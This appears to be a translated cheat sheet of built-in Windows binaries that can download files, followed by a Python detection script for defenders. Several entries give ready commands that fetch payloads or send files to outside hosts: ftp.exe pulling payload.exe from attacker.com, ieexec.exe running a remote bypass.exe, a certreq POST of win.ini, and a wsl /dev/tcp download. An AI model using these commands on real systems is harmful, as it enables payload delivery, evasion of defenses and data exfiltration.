Built-in Windows download utilities

0x01 Bitsadmin.exe (blocked)

Used for managing background intelligent transfer
OS: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10

Paths:
C:\Windows\System32\bitsadmin.exe
C:\Windows\SysWOW64\bitsadmin.exe

Create a BITS job named 1, add a file to it (here autoruns.exe, fetched from the URL into the local path), then resume and complete the job

bitsadmin /create 1
bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe 
bitsadmin /RESUME 1 
bitsadmin /complete 1

Command to copy cmd.exe to another folder (the same steps chained on one line, followed by a reset of the job list)

bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset

0x02 CertReq.exe (not blocked)

Used for requesting and managing certificates
OS: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10

Paths:
C:\Windows\System32\certreq.exe
C:\Windows\SysWOW64\certreq.exe

Sends c:\windows\win.ini in an HTTP POST request to https://example.org/ and saves the response to output.txt

CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt

0x03 Certutil.exe (not blocked)

Windows binary used for handling certificates
OS: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10

Paths:
C:\Windows\System32\certutil.exe
C:\Windows\SysWOW64\certutil.exe

Download 7-Zip and save it to disk in the current folder; the second command saves the downloaded script into an alternate data stream (c:\temp:ttt)

certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

0x04 Desktopimgdownldr.exe

Windows binary used to configure the lock screen/desktop image
OS: Windows 10

Paths:
c:\windows\system32\desktopimgdownldr.exe

Download a file and set it as the machine's lock screen image (SYSTEMROOT is overridden so the downloaded file lands under C:\Windows\Temp instead of C:\Windows)

set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr

0x05 Diantz.exe (test unsuccessful)

Binary that packages existing files into a cabinet (.cab) file
OS: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1

Paths:
c:\windows\system32\diantz.exe
c:\windows\syswow64\diantz.exe

Download and compress a remote file and store it in a .cab file on the local machine

diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab

0x06 Esentutl.exe (test unsuccessful)

Binary for working with Microsoft Joint Engine Technology (JET) databases
OS: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10

Paths:
C:\Windows\System32\esentutl.exe
C:\Windows\SysWOW64\esentutl.exe

Copy the source EXE to the destination EXE file (here between two WebDAV paths)

esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o

0x07 Expand.exe (test unsuccessful)

Binary that expands one or more compressed files
OS: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10

Paths:
C:\Windows\System32\Expand.exe
C:\Windows\SysWOW64\Expand.exe

Copy the source file to the destination

expand \\webdav\folder\file.bat c:\ADS\file.bat

0x08 Extrac32.exe (test unsuccessful)

Paths:
C:\Windows\System32\extrac32.exe
C:\Windows\SysWOW64\extrac32.exe

Copy the source file to the destination file, overwriting it

extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt

0x09 Ftp.exe

A binary designed for connecting to FTP servers
OS: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10

Paths:
C:\Windows\System32\ftp.exe
C:\Windows\SysWOW64\ftp.exe

Download: spawns a new process via ftp.exe, which downloads the binary (the FTP commands are written to a script file with echo and fed to ftp.exe through -s:)

cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"

0x10 GfxDownloadWrapper.exe (test unsuccessful)

Remote file download used by the Intel Graphics Control Panel; receives as first parameter a URL and a destination file path.
OS: Windows 10

Paths (one per installed Intel graphics driver package under c:\windows\system32\driverstore\filerepository\):

GfxDownloadWrapper.exe downloads the content returned by URL and writes it to DESTINATION FILE PATH. The binary is signed by "Microsoft Windows Hardware Compatibility Publisher", "Microsoft Windows Third Party Component CA 2012", "Microsoft Time-Stamp PCA 2010" and "Microsoft Time-Stamp Service".

C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"

0x11 Hh.exe (not blocked)

Binary used for processing .chm files in Windows
OS: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10

Paths:
C:\Windows\System32\hh.exe
C:\Windows\SysWOW64\hh.exe

Open the target PowerShell script with HTML Help

HH.exe http://some.url/script.ps1

Execute calc.exe with HTML Help.

HH.exe c:\windows\system32\calc.exe

0x12 Ieexec.exe (test unsuccessful)

The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL.
OS: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10

Paths:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe

Download and execute bypass.exe from a remote server

ieexec.exe http://x.x.x.x:8080/bypass.exe

0x13 Makecab.exe (untested)

Binary to package existing files into a cabinet (.cab) file
OS: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10

Paths:
C:\Windows\System32\makecab.exe
C:\Windows\SysWOW64\makecab.exe

Download and compress the target file and store it in the destination .cab file

makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab

0x14 Excel.exe (test unsuccessful; not signed)

Microsoft Office binary
OS: Windows

Paths:
C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Excel.exe
C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Excel.exe
C:\Program Files (x86)\Microsoft Office\Office16\Excel.exe
C:\Program Files\Microsoft Office\Office16\Excel.exe
C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Excel.exe
C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Excel.exe
C:\Program Files (x86)\Microsoft Office\Office15\Excel.exe
C:\Program Files\Microsoft Office\Office15\Excel.exe
C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Excel.exe
C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Excel.exe
C:\Program Files (x86)\Microsoft Office\Office14\Excel.exe
C:\Program Files\Microsoft Office\Office14\Excel.exe
C:\Program Files (x86)\Microsoft Office\Office12\Excel.exe
C:\Program Files\Microsoft Office\Office12\Excel.exe

Download a payload from a remote server and place it in the cache folder

Excel.exe http://192.168.1.10/TeamsAddinLoader.dll

0x15 Powerpnt.exe (test unsuccessful)

Microsoft Office binary.
OS: Windows

Paths:
C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Powerpnt.exe
C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Powerpnt.exe
C:\Program Files (x86)\Microsoft Office\Office16\Powerpnt.exe
C:\Program Files\Microsoft Office\Office16\Powerpnt.exe
C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Powerpnt.exe
C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Powerpnt.exe
C:\Program Files (x86)\Microsoft Office\Office15\Powerpnt.exe
C:\Program Files\Microsoft Office\Office15\Powerpnt.exe
C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Powerpnt.exe
C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Powerpnt.exe
C:\Program Files (x86)\Microsoft Office\Office14\Powerpnt.exe
C:\Program Files\Microsoft Office\Office14\Powerpnt.exe
C:\Program Files (x86)\Microsoft Office\Office12\Powerpnt.exe
C:\Program Files\Microsoft Office\Office12\Powerpnt.exe

Download a remote payload and place it in the cache folder

Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll"

0x16 Squirrel.exe

Binary to update the existing installed Nuget/squirrel package. Part of the Microsoft Teams installation.
OS: Windows 7 and up with Microsoft Teams installed

Paths:
%localappdata%\Microsoft\Teams\current\Squirrel.exe

The binary above goes to the URL, looks for a RELEASES file, and downloads the nuget package

squirrel.exe --download [url to package]

0x17 Update.exe

Binary to update the existing installed Nuget/squirrel package. Part of the Microsoft Teams installation.

Paths:
%localappdata%\Microsoft\Teams\update.exe

The binary above goes to the URL, looks for a RELEASES file, and downloads the nuget package

Update.exe --download [url to package]

0x18 Winword.exe (blocked)

Microsoft Office binary.
OS: Windows

Paths:
C:\Program Files (x86)\Microsoft Office\root\Office16\winword.exe
C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\winword.exe
C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\winword.exe
C:\Program Files (x86)\Microsoft Office\Office16\winword.exe
C:\Program Files\Microsoft Office\Office16\winword.exe
C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\winword.exe
C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\winword.exe
C:\Program Files (x86)\Microsoft Office\Office15\winword.exe
C:\Program Files\Microsoft Office\Office15\winword.exe
C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\winword.exe
C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\winword.exe
C:\Program Files (x86)\Microsoft Office\Office14\winword.exe
C:\Program Files\Microsoft Office\Office14\winword.exe
C:\Program Files (x86)\Microsoft Office\Office12\winword.exe
C:\Program Files\Microsoft Office\Office12\winword.exe

Download a payload from a remote server

winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"

0x19 Wsl.exe

Windows Subsystem for Linux executable (requires the subsystem to be enabled on Windows 10)
OS: Windows 10, Windows Server 2019

Paths:
C:\Windows\System32\wsl.exe

Execute calc.exe from wsl.exe

wsl.exe -e /mnt/c/Windows/System32/calc.exe

Download a file from 192.168.1.10

wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
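A defender-side detection example, added here and not part of the original post: one rule per download technique listed above is run over a few constructed process-creation events (Sysmon-style Image/CommandLine fields as JSON lines; the field names and the sample events are assumptions) and each matching event is reported with the technique it resembles.

```python
"""Flag LOLBin download activity in process-creation events (added example)."""
import json
import re

URL = r"https?://"
UNC = r"\\\\[^\s\\]+\\"  # \\host\share\... (SMB or WebDAV source)

# (image basename, command-line pattern, description): one rule per
# technique on this page. Matching is case-insensitive.
RULES = [
    (r"certutil\.exe", rf"-urlcache\b.*{URL}", "certutil URL-cache download"),
    (r"bitsadmin\.exe", rf"/(addfile|transfer)\b.*{URL}", "BITS job fetching a URL"),
    (r"certreq\.exe", rf"-post\b.*-config\s+{URL}", "certreq POST to a remote URL"),
    (r"desktopimgdownldr\.exe", r"/lockscreenurl:", "lock-screen image download"),
    (r"hh\.exe", URL, "HTML Help opening a URL"),
    (r"ieexec\.exe", URL, "IEExec launching a remote .NET app"),
    (r"(excel|powerpnt|winword)\.exe", URL, "Office binary given a URL argument"),
    (r"\\teams\\(current\\squirrel|update)\.exe", r"--download\b", "Teams Squirrel/Update download"),
    (r"gfxdownloadwrapper\.exe", URL, "Intel GfxDownloadWrapper fetching a URL"),
    (r"(esentutl|expand|extrac32|makecab|diantz)\.exe", UNC, "copy from a UNC/WebDAV path"),
    (r"ftp\.exe", r"-s:", "ftp.exe driven by a script file"),
    (r"wsl\.exe", r"/dev/tcp/", "WSL bash raw TCP download"),
]
COMPILED = [(re.compile(img + "$", re.I), re.compile(cmd, re.I), desc)
            for img, cmd, desc in RULES]

# Constructed sample events; the Sysmon-style field names are an assumption.
SAMPLE_EVENTS = r"""
{"Image": "C:\\Windows\\System32\\certutil.exe", "CommandLine": "certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe"}
{"Image": "C:\\Windows\\System32\\certutil.exe", "CommandLine": "certutil -hashfile C:\\Windows\\win.ini SHA256"}
{"Image": "C:\\Windows\\System32\\bitsadmin.exe", "CommandLine": "bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\\data\\playfolder\\autoruns.exe"}
{"Image": "C:\\Windows\\System32\\desktopimgdownldr.exe", "CommandLine": "desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr"}
{"Image": "C:\\Windows\\System32\\esentutl.exe", "CommandLine": "esentutl.exe /y \\\\live.sysinternals.com\\tools\\adrestore.exe /d C:\\temp\\adrestore.exe /o"}
{"Image": "C:\\Windows\\System32\\wsl.exe", "CommandLine": "wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'"}
{"Image": "C:\\Program Files\\Microsoft Office\\Office16\\winword.exe", "CommandLine": "winword.exe http://192.168.1.10/TeamsAddinLoader.dll"}
{"Image": "C:\\Program Files\\Microsoft Office\\Office16\\winword.exe", "CommandLine": "winword.exe C:\\Users\\alice\\report.docx"}
"""


def classify(image: str, cmdline: str):
    """Return the description of the first matching rule, or None."""
    for img_re, cmd_re, desc in COMPILED:
        if img_re.search(image) and cmd_re.search(cmdline):
            return desc
    return None


def scan(jsonl: str):
    """Return [(image, description)] for every event that matches a rule."""
    hits = []
    for line in filter(str.strip, jsonl.splitlines()):
        ev = json.loads(line)
        desc = classify(ev.get("Image", ""), ev.get("CommandLine", ""))
        if desc:
            hits.append((ev["Image"], desc))
    return hits


if __name__ == "__main__":
    for image, desc in scan(SAMPLE_EVENTS):
        print(f"{desc:40} {image}")
```

Of the eight sample events, six are flagged; the certutil -hashfile and the local .docx launch are left alone, which is the benign-use distinction these rules hinge on.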